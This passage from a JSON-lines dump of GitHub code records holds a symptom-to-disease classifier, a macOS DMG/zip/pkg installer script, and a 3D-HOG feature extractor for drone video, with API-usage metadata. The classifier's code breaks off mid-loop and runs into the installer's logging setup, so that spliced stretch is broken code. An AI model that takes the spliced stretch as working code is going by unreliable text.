"usage_type": "attribute"}, {"api_name": "common_tasks.run_check_call", "line_number": 102, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path", "line_number": 110, "usage_type": "attribute"}, {"api_name": "common_tasks.clean_coverage", "line_number": 112, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 117, "usage_type": "call"}, {"api_name": "os.path", "line_number": 117, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 118, "usage_type": "call"}, {"api_name": "os.path", "line_number": 118, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 119, "usage_type": "call"}, {"api_name": "os.path", "line_number": 119, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 122, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 125, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 131, "usage_type": "call"}, {"api_name": "os.path", "line_number": 131, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path", "line_number": 132, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path", "line_number": 133, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 136, "usage_type": "call"}, {"api_name": "os.environ.copy", "line_number": 141, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 141, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 144, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 150, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 152, "usage_type": "call"}, {"api_name": "common_tasks.read_file", "line_number": 158, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 159, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 165, "usage_type": "call"}, {"api_name": "common_tasks.log_file", "line_number": 179, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 182, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path", "line_number": 184, "usage_type": "attribute"}, {"api_name": "re.split", "line_number": 201, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 204, "usage_type": "call"}, {"api_name": "pkg_resources.parse_requirements", "line_number": 210, "usage_type": "call"}, {"api_name": "pkg_resources.RequirementParseError", "line_number": 211, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 237, "usage_type": "call"}, {"api_name": "os.path", "line_number": 237, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 238, "usage_type": "call"}, {"api_name": "os.path", "line_number": 238, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 239, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 241, "usage_type": "call"}, {"api_name": "os.path", "line_number": 241, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 241, "usage_type": "call"}, {"api_name": "common_tasks.parse_setup", "line_number": 242, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 243, "usage_type": "call"}, {"api_name": "common_tasks.run_check_call", "line_number": 244, "usage_type": "call"}, {"api_name": "sys.executable", "line_number": 244, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 246, "usage_type": "call"}, {"api_name": "os.path", "line_number": 246, "usage_type": "attribute"}, {"api_name": "common_tasks.find_whl", "line_number": 246, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 247, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 248, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 266, "usage_type": "call"}, {"api_name": "os.path", "line_number": 266, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 267, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 270, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 280, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 284, "usage_type": "call"}, {"api_name": "os.path", "line_number": 284, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 289, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 290, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 292, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 294, "usage_type": "call"}, {"api_name": "os.path", "line_number": 294, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 299, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 300, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 302, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 304, "usage_type": "call"}, {"api_name": "os.path", "line_number": 304, "usage_type": "attribute"}, {"api_name": "sys.version.split", "line_number": 305, "usage_type": "call"}, {"api_name": "sys.version", "line_number": 305, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 309, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 310, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 312, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 314, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 314, "usage_type": "call"}, {"api_name": "os.path", "line_number": 314, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 315, "usage_type": "call"}, {"api_name": "os.path", "line_number": 315, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 316, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 317, "usage_type": "call"}, {"api_name": "os.path", "line_number": 317, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 319, "usage_type": "call"}, {"api_name": "os.path", "line_number": 319, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 320, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 322, "usage_type": "call"}, {"api_name": "os.path", "line_number": 322, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 323, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 325, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 326, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 328, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 331, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 333, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 335, "usage_type": "call"}, {"api_name": "os.path", "line_number": 335, "usage_type": "attribute"}, {"api_name": "shutil.move", "line_number": 336, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 338, "usage_type": "call"}, {"api_name": "os.path", "line_number": 338, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 340, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 340, "usage_type": "call"}, {"api_name": "os.path", "line_number": 340, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 342, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 344, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 344, "usage_type": "call"}, {"api_name": "os.path", "line_number": 344, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 345, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 352, "usage_type": "call"}, {"api_name": "os.path", "line_number": 352, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 352, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 353, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 355, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 357, "usage_type": "call"}, {"api_name": "os.path", "line_number": 357, "usage_type": "attribute"}, {"api_name": "common_tasks.run_check_call", "line_number": 361, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 368, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 375, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 383, "usage_type": "call"}, {"api_name": "os.path", "line_number": 383, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 384, "usage_type": "call"}, {"api_name": "os.path", "line_number": 384, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 386, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 391, "usage_type": "call"}, {"api_name": "os.path", "line_number": 391, "usage_type": "attribute"}, {"api_name": "common_tasks.create_code_coverage_params", "line_number": 392, "usage_type": "call"}, {"api_name": "common_tasks.is_error_code_5_allowed", "line_number": 401, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 405, "usage_type": "call"}, {"api_name": "os.path", "line_number": 405, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 406, "usage_type": "call"}, {"api_name": "os.path", "line_number": 406, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 407, "usage_type": "call"}, {"api_name": "os.path", "line_number": 407, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 409, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 411, "usage_type": "call"}, {"api_name": "os.path", "line_number": 411, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 417, "usage_type": "call"}, {"api_name": "os.path", "line_number": 417, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 418, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 426, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 451, "usage_type": "call"}]}
+{"seq_id": "2500931251", "text": "import pandas as pd\nimport numpy as np\nimport pickle\nimport os\nfrom joblib import dump,load\nfrom scripts.disease_to_symptoms import D2S\nfrom sklearn.ensemble import RandomForestClassifier\n\nclass S2D:\n def __init__(self,ROOT_DIR,mode=\"train\"):\n self.ROOT_DIR=ROOT_DIR\n if mode==\"train\":\n self.load_data()\n self.model=RandomForestClassifier(300,n_jobs=-1)\n else:\n self.model=load(os.path.join(self.ROOT_DIR,'models/custom/S2D.joblib'))\n self.diseases,self.symptoms_list=pickle.load(open(os.path.join(self.ROOT_DIR,'models/custom/S2D.b'),'rb'))\n def load_data(self):\n self.data=pd.read_csv(os.path.join(self.ROOT_DIR,'datasets/preprocessed/df_pivoted.csv'))\n def train(self):\n self.symptoms_list=self.data.columns[2:]\n self.diseases=self.data['Source']\n symptoms=self.data.iloc[:,2:]\n self.model.fit(symptoms,self.diseases)\n self.store_params()\n def predict(self,symptoms):\n self.symptoms=symptoms\n symptom_vector=np.zeros(self.symptoms_list.size)\n for s in symptoms:\n symptom_vector[self.symptoms_list.get_loc(s)]=1\n probabilities=self.model.predict_proba([symptom_vector])\n predictions=sorted(zip(probabilities[0],self.diseases),reverse=True)\n predicted_diseases=[]\n i=0\n while len(predicted_diseases)!=3 and i\\n%(message)s\\n'\n)\nformatter_sl = logging.Formatter(\n '%(name)s: %(levelname)s %(message)s'\n)\n\nsyslog = logging.handlers.SysLogHandler(address=\"/var/run/syslog\")\nsyslog.setLevel(logging.WARNING)\nsyslog.setFormatter(formatter_sl)\nlogger.addHandler(syslog)\n#\n# console = logging.StreamHandler()\n# console.setLevel(logging.DEBUG)\n# console.setFormatter(formatter_ch)\n# logger.addHandler(console)\n\n\ndef mount_dmg(dmg, unmount=False):\n \"\"\" (Un)Mounts given DMG at /Volumes/NAME \"\"\"\n\n # Generate Mountpoint\n mount_point = os.path.join('/Volumes/',\n os.path.splitext(os.path.basename(dmg))[0])\n\n # Mount dmg\n dnull = open('/dev/null', 'w')\n if unmount:\n logger.info(\"Unmounted %s\")\n return_code = subprocess.call([\n 'hdiutil',\n 'detach',\n mount_point\n ], stdout=dnull)\n else:\n logger.info(\"Mounted %s at %s\" % (dmg, mount_point))\n return_code = subprocess.call([\n 'hdiutil',\n 'attach',\n '-mountpoint',\n mount_point,\n dmg\n ], stdout=dnull)\n\n # Minimal Error Handling\n if return_code != 0:\n logger.error(\"%d: %s\" %\n (return_code, errno.errorcode[return_code]))\n raise OSError(return_code)\n\n return mount_point\n\n\nclass NoApplicationException(Exception):\n pass\n\n\nclass NotInstalledException(Exception):\n pass\n\n\nclass Installable(object):\n \"\"\"\n Specifices an installable object.\n \"\"\"\n\n #: List of Acceptable Types\n TYPES = [\n '.dmg',\n '.zip',\n '.pkg',\n '.app',\n '.alfredworkflow',\n ]\n\n #: List of Search Paths\n PATHS = [\n '~/Downloads/',\n # '~/Desktop/',\n ]\n\n def __init__(self, path, types=TYPES):\n \"\"\"\n Creates new Instance of Installable from path.\n\n During initialization, zipfiles are inspected to find any possible\n Installable inside them.\n\n Args:\n path: Object to reference in this Instance\n REQUIRED\n types: Types which to accept in path. Needs to be a subset of TYPES\n Defaults to TYPES\n\n Raises:\n NoApplicationException: is raised when the type of 'path' is not in\n TYPES, i.e. not recognized.\n This is also true if type is '.zip', but this '.zip' does not\n contain any valid Installables.\n \"\"\"\n path = path.rstrip('/')\n ext = os.path.splitext(path)[1]\n\n # Check if path is a valid File\n if ext not in types:\n logger.debug(\"%s is no valid Installable object.\" % path)\n raise NoApplicationException()\n\n # Special Zip Treatment\n # Only accept zips, if they include a valid type\n # Inside zips, ignore .zips and .dmgs\n inzip = []\n\n if ext == '.zip':\n _types = list(types)\n _types.remove('.zip')\n _types.remove('.dmg')\n\n zf = zipfile.ZipFile(path, 'r')\n\n for f in zf.namelist():\n if f.startswith(\"__MACOSX/\"):\n continue\n\n t = os.path.splitext(f.rstrip('/'))[1]\n if t in _types and f.count(t+'/') == 1:\n logger.info(\"Found Installable %s inside %s\" % (f, path))\n inzip.append(f.split('.app/', 1)[0]+'.app/')\n\n if not inzip:\n logger.debug(\"No Installables in %s\" % path)\n raise NoApplicationException()\n\n self.inzip = set(inzip)\n self.path = path\n self.ext = ext\n\n def _install_app(self, prefix, overrite=False, remove=False):\n dest = os.path.join(prefix, os.path.basename(self.path))\n if os.path.exists(dest):\n if overrite:\n logger.debug(\"Trying to remove %s\" % (dest))\n send2trash.send2trash(dest)\n logger.info(\"Moved %s to trash.\" % dest)\n else:\n logger.error(\"File exists: %s\" % dest)\n raise OSError(17, \"File exists\", dest)\n\n logger.debug(\n \"Installing: %s\" % os.path.basename(self.path))\n return_code = subprocess.call(\n ['/bin/cp', '-a', self.path, prefix])\n\n # Minimal Error handling\n if return_code != 0:\n logger.error(\"%d: %s\" %\n (return_code, errno.errorcode[return_code]))\n raise OSError(return_code)\n\n logger.info(\"Installed %s to %s\" % (self, prefix))\n\n def _install_zip(self, prefix, overrite=False, remove=False):\n tmp = tempfile.gettempdir()\n\n return_code = subprocess.call(\n ['unzip', '-u', '-o', self.path, '-d', tmp]\n )\n\n # Minimal Error handling\n if return_code != 0:\n logger.error(\"%d: %s\" %\n (return_code, errno.errorcode[return_code]))\n raise OSError(return_code)\n\n for f in self.inzip:\n a = Installable(os.path.join(tmp, f))\n a.install(prefix, overrite=overrite)\n\n def _install_dmg(self, prefix, overrite=False, remove=False):\n where = mount_dmg(self.path)\n\n apps = self.get_installables(path=where)\n for app in apps:\n app.install(prefix, overrite=overrite)\n\n mount_dmg(self.path, unmount=True)\n\n def _install_pkg(self, prefix=None, overrite=False, remove=False):\n return_code = subprocess.call(['open', '-W', self.path])\n\n # Minimal Error handling\n if return_code != 0:\n logger.error(\"%d: %s\" %\n (return_code, errno.errorcode[return_code]))\n raise OSError(return_code)\n\n def _install_alfredworkflow(self, prefix=\"/\",\n overrite=False, remove=False):\n if remove:\n tmp = tempfile.gettempdir()\n\n return_code = subprocess.call(\n ['/bin/cp', '-a', self.path, tmp])\n\n # Minimal Error handling\n if return_code != 0:\n logger.error(\"%d: %s\" %\n (return_code, errno.errorcode[return_code]))\n raise OSError(return_code)\n\n path = os.path.join(tmp, os.path.basename(self.path))\n else:\n path = self.path\n\n return_code = subprocess.call(\n ['open', path]\n )\n\n # Minimal Error handling\n if return_code != 0:\n logger.error(\"%d: %s\" %\n (return_code, errno.errorcode[return_code]))\n raise OSError(return_code)\n\n def install(self, prefix='/Applications/', remove=False, overrite=False):\n \"\"\"\n Installs the Applications referenced by this Instance.\n\n This method is mainly a wrapper around type-specific install functions.\n\n Args:\n prefix: Path to where Applications ('.app') shall be installed.\n Defaults to '/Applications/'.\n Note: This prefix will only be used for ('.app')-Files and\n ignored otherwise.\n remove: Boolean. If set to 'True', method will try to remove\n Object after successful installation.\n Defaults to 'False'\n overrite: Boolean. If set to 'True', will overrite existing Apps at\n path.\n Defaults to 'False'\n\n Returns:\n Original Path of the referenced object on success, None otherwise.\n\n Raises:\n OSError: is raised on several occasions, when installation failed.\n This can for example happen, when you dont have Permissions at\n path.\n \"\"\"\n\n logger.debug(\n \"Trying to install %s to %s with remove %s and overrite %s\" %\n (self.path, prefix, remove, overrite))\n try:\n if self.removed:\n logger.warning(\"%s has been removed!\" % self)\n return None\n except AttributeError:\n pass\n\n getattr(self, \"_install\" + self.ext.replace('.', \"_\"))(\n prefix=prefix,\n overrite=overrite,\n remove=remove,\n )\n logger.info(\"Installed %s to %s\" % (self, prefix))\n\n self.installed = True\n\n if remove:\n self.remove()\n\n return self.path\n\n def remove(self, force=False):\n \"\"\"\n Removes the Container of Applications (dmgs, zips, pkgs).\n\n This method can only be called after install() has run succesfully.\n\n Args:\n force: If set, Installable will be removed even if it has not been\n installed. Defaults to 'False'\n\n Raises:\n NotInstalledException: If Installable().install has not been called\n successfully and force is 'False'\n \"\"\"\n\n if not self.installed and not force:\n logger.debug(\"Cant remove %s!\" % self)\n raise NotInstalledException()\n\n try:\n send2trash.send2trash(self.path)\n self.removed = True\n logger.info(\"Moved %s to trash.\" % self)\n except OSError as ose:\n logger.exception(ose)\n\n def __len__(self):\n \"\"\"returns number of installable objects\"\"\"\n return 1 if len(self.inzip) == 0 else len(self.inzip)\n\n def __repr__(self):\n \"\"\"gives a representation of the instance\"\"\"\n return \"<\" + self.__class__.__name__ + \": \" + str(self) + \">\"\n\n def __str__(self):\n \"\"\"returns __unicode__\"\"\"\n return unicode(self).encode('utf-8')\n\n def __unicode__(self):\n \"\"\"gives the basename of the referenced installable object\"\"\"\n return os.path.basename(self.path)\n\n # Static Methods\n @staticmethod\n def get_installables(paths=PATHS, types=TYPES):\n \"\"\"\n Finds installable objects\n\n Args:\n paths: List of Path in which to look for installable objects.\n Defaults to Installable.PATHS\n types: List of Types to recognize as installable objects. Must be\n a subset of Installable.TYPES. Defaults to Installable.TYPES\n\n Returns:\n a List of Installable() objects.\n \"\"\"\n\n inst = []\n\n for p in paths:\n p = os.path.expanduser(p)\n for f in os.listdir(p):\n try:\n i = Installable(os.path.join(p, f), types=types)\n logger.info(\"Found Installable at '%s'\" % i.path)\n inst.append(i)\n except NoApplicationException:\n logger.log(logging.NOTSET, \"No valid Installable at %s\")\n\n return inst\n", "repo_name": "fgr0/dmginstall", "sub_path": "install.py", "file_name": "install.py", "file_ext": "py", "file_size_in_byte": 11609, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 16, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.getLogger", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 33, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 35, "usage_type": "call"}, {"api_name": "logging.Formatter", "line_number": 38, "usage_type": "call"}, {"api_name": "logging.handlers.SysLogHandler", "line_number": 42, "usage_type": "call"}, {"api_name": "logging.handlers", "line_number": 42, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.path.join", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 57, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 57, "usage_type": "name"}, {"api_name": "os.path.path.splitext", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 58, "usage_type": "name"}, {"api_name": "os.path.path.basename", "line_number": 58, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 64, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 71, "usage_type": "call"}, {"api_name": "errno.errorcode", "line_number": 82, "usage_type": "attribute"}, {"api_name": "os.path.path.splitext", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 136, "usage_type": "name"}, {"api_name": "zipfile.ZipFile", "line_number": 153, "usage_type": "call"}, {"api_name": "os.path.path.splitext", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 159, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 159, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 173, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 173, "usage_type": "name"}, {"api_name": "os.path.path.basename", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path.path.exists", "line_number": 174, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 174, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 174, "usage_type": "name"}, {"api_name": "send2trash.send2trash", "line_number": 177, "usage_type": "call"}, {"api_name": "os.path.path.basename", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 184, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 184, "usage_type": "name"}, {"api_name": "subprocess.call", "line_number": 185, "usage_type": "call"}, {"api_name": "errno.errorcode", "line_number": 191, "usage_type": "attribute"}, {"api_name": "tempfile.gettempdir", "line_number": 197, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 199, "usage_type": "call"}, {"api_name": "errno.errorcode", "line_number": 206, "usage_type": "attribute"}, {"api_name": "os.path.path.join", "line_number": 210, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 210, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 210, "usage_type": "name"}, {"api_name": "subprocess.call", "line_number": 223, "usage_type": "call"}, {"api_name": "errno.errorcode", "line_number": 228, "usage_type": "attribute"}, {"api_name": "tempfile.gettempdir", "line_number": 234, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 236, "usage_type": "call"}, {"api_name": "errno.errorcode", "line_number": 242, "usage_type": "attribute"}, {"api_name": "os.path.path.join", "line_number": 245, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 245, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 245, "usage_type": "name"}, {"api_name": "os.path.path.basename", "line_number": 245, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 249, "usage_type": "call"}, {"api_name": "errno.errorcode", "line_number": 256, "usage_type": "attribute"}, {"api_name": "send2trash.send2trash", "line_number": 330, "usage_type": "call"}, {"api_name": "os.path.path.basename", "line_number": 350, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 350, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 350, "usage_type": "name"}, {"api_name": "os.path.path.expanduser", "line_number": 371, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 371, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 371, "usage_type": "name"}, {"api_name": "os.path.listdir", "line_number": 372, "usage_type": "call"}, {"api_name": "os.path", "line_number": 372, "usage_type": "name"}, {"api_name": "os.path.path.join", "line_number": 374, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 374, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 374, "usage_type": "name"}, {"api_name": "logging.NOTSET", "line_number": 378, "usage_type": "attribute"}]}
+{"seq_id": "14427950087", "text": "# !/usr/bin/python\nimport os\nimport time\nimport cv2 as cv\nimport numpy as np\nimport annot_parser\nimport myhog3d\nimport matplotlib.pyplot as plt\n# import seaborn as sns\nfrom collections import deque\n# import sklearn.??? as ??? # -- if needed\n\n## ---- REF ---\n# [1] [A Spatio-Temporal Descriptor Based on 3D-Gradients](https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiirOSqjqPZAhUpwVQKHUpyB3AQFggsMAA&url=https%3A%2F%2Fhal.inria.fr%2Finria-00514853%2Fdocument&usg=AOvVaw0mijsjePgJYJ4jAGXSxANF)\n# [2] [Behavior recognition via sparse spatio-temporal features](https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwicrKfEjqPZAhVFylQKHRjaB3AQFgg6MAE&url=https%3A%2F%2Fpdollar.github.io%2Ffiles%2Fpapers%2FDollarVSPETS05cuboids.pdf&usg=AOvVaw3P5KcCPAyHlxoHcp0dg-Xr)\n\n\ndef im2double(im):\n min_val = np.min(im.ravel())\n max_val = np.max(im.ravel())\n if max_val != min_val:\n out = (im.astype('float') - min_val) / (max_val - min_val)\n else:\n out = im.astype('float') / 255\n return out\n\ndata_path = \"D:/Proj/UAV/dataset/drones/\"\ndata_postfix = \".avi\"\nif not os.path.exists(\"../features3d\"): os.makedirs(\"../features3d\")\n\ncap = cv.VideoCapture()\n\ndrones_nums = [1, 11, 12, 18, 19, 29, 37, 46, 47, 48, 49, 53, 55, 56]\n\n# TRAIN_SET_RANGE = drones_nums\nTRAIN_SET_RANGE = [11]\nTRAIN_MODE = \"strict\"\nSAVE_FEATURE = False\n\nIF_SHOW_PATCH = not SAVE_FEATURE # warning: it can critically slow down extraction process\nIF_PLOT_HOG_FEATURE = not SAVE_FEATURE\n\n# parse videos in training set\nTIC = time.time()\nfor VID_NUM in TRAIN_SET_RANGE: #---- do all those shits down here\n # {\n \n locations, labels = annot_parser.parse(\"X:/UAV/annot/drones/\", VID_NUM)\n data_num = VID_NUM\n\n cap = cv.VideoCapture(data_path + \"Video_%s\"%data_num + data_postfix)\n file_out = open(\"../features3d/feature3d_%d.txt\"%VID_NUM, 'w')\n\n # parse each video \n time_stamp = 0\n CUBE_X, CUBE_Y, CUBE_T = 40 , 40, 4; # define the size of each st-cube to be processed\n\n tic = time.time()\n \n buffer = deque() # buffer for st-cube\n while(True):\n ret, frame = cap.read()\n if not ret: break\n frame = cv.cvtColor(frame, cv.COLOR_BGR2GRAY) # now is uint\n\n frame = im2double(frame)# caution: set each frame as double\n\n # the coord range of each st-cube\n x_0 = locations[time_stamp][0] # 1\n x_1 = locations[time_stamp][2] # 3\n y_0 = locations[time_stamp][1] # 2\n y_1 = locations[time_stamp][3] # 4\n\n\n\n ## !!!! WE MAY NEED MORE SAMPLES IN THIS SEC !!!\n if not x_0 == -1 : # annot-parser would return coord as -1 if no target is in current frame\n patch = frame[x_0:x_1, y_0:y_1]\n patch = cv.resize(patch, (CUBE_X, CUBE_Y)) # size of target area varies in time so we resize each patch to a certain size, fitting HoG Descriptor.\n else:\n rand_nega_x = int(np.floor((frame.shape[0] - CUBE_X) * np.random.rand()))\n rand_nega_y = int(np.floor((frame.shape[1] - CUBE_Y) * np.random.rand()))\n patch = frame[rand_nega_x : rand_nega_x + CUBE_X, rand_nega_y : rand_nega_y + CUBE_Y]\n\n # ----------------- ST-CUBE generation with deque buffer --------------|\n buffer.append(patch) # push a patch to the rear of stcube \n\n if len(buffer) == CUBE_T + 1: \n buffer.popleft() # pop a frame from head when buffer is filled\n stcube = np.array(buffer)\n # print(stcube.shape)\n\n label_cube = labels[time_stamp - CUBE_T + 1: time_stamp + 1]\n \n if CUBE_T < 5 and IF_SHOW_PATCH:\n for k in range(CUBE_T):\n plt.subplot(1, CUBE_T, k + 1)\n plt.title(label_cube[k])\n plt.imshow(stcube[:][:][k])\n plt.show()\n\n\n\n if TRAIN_MODE == \"strict\":\n FINAL_LABEL_FOR_CUBE = 1\n for label_of_frame in label_cube:\n FINAL_LABEL_FOR_CUBE = FINAL_LABEL_FOR_CUBE and label_of_frame\n elif TRAIN_MODE == \"loose\":\n FINAL_LABEL_FOR_CUBE = 0\n for label_of_frame in label_cube:\n FINAL_LABEL_FOR_CUBE = FINAL_LABEL_FOR_CUBE or label_of_frame\n elif TRAIN_MODE == \"current\":\n FINAL_LABEL_FOR_CUBE = labels[time_stamp]\n else:\n FINAL_LABEL_FOR_CUBE = labels[time_stamp]\n\n FHOG3D = myhog3d.compute(stcube, (10, 4), (10, 4), 2)\n\n if IF_PLOT_HOG_FEATURE:\n plt.plot(FHOG3D)\n plt.title(\"VID[%d], LAB[c%s : f%s], [%d / %d]\"%(VID_NUM, FINAL_LABEL_FOR_CUBE, labels[time_stamp], time_stamp, locations.shape[0]))\n plt.show()\n\n assert label_cube[-1] == labels[time_stamp]\n\n if SAVE_FEATURE:\n file_out.write(\"%d \" % (FINAL_LABEL_FOR_CUBE))\n for idx in range(FHOG3D.size):\n # idx + 1 to fit libsvm format (xgb)\n file_out.write(\"%d:%f \" % (idx + 1, FHOG3D[idx]))\n file_out.write('\\n')\n\n time_stamp = time_stamp + 1\n if time_stamp == locations.shape[0] : break\n\n toc = time.time() - tic\n print(\"Time elapsed: %5.3f sec;\"%toc)\n # if len(buffer) == CUBE_T: print(\"Buffer size correct: %d for %d.\"%(len(buffer), CUBE_T))\n\nTOC = time.time() - TIC\nprint(\"/ / / / / / / / / / / /\\nDataset generated in: %5.3f sec.\"%TOC)\n", "repo_name": "pigtamer/uav_py_feature", "sub_path": "hogger/deprecated/extract3d.py", "file_name": "extract3d.py", "file_ext": "py", "file_size_in_byte": 5483, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.min", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 31, "usage_type": "call"}, {"api_name": "time.time", "line_number": 44, "usage_type": "call"}, {"api_name": "annot_parser.parse", "line_number": 48, "usage_type": "call"}, 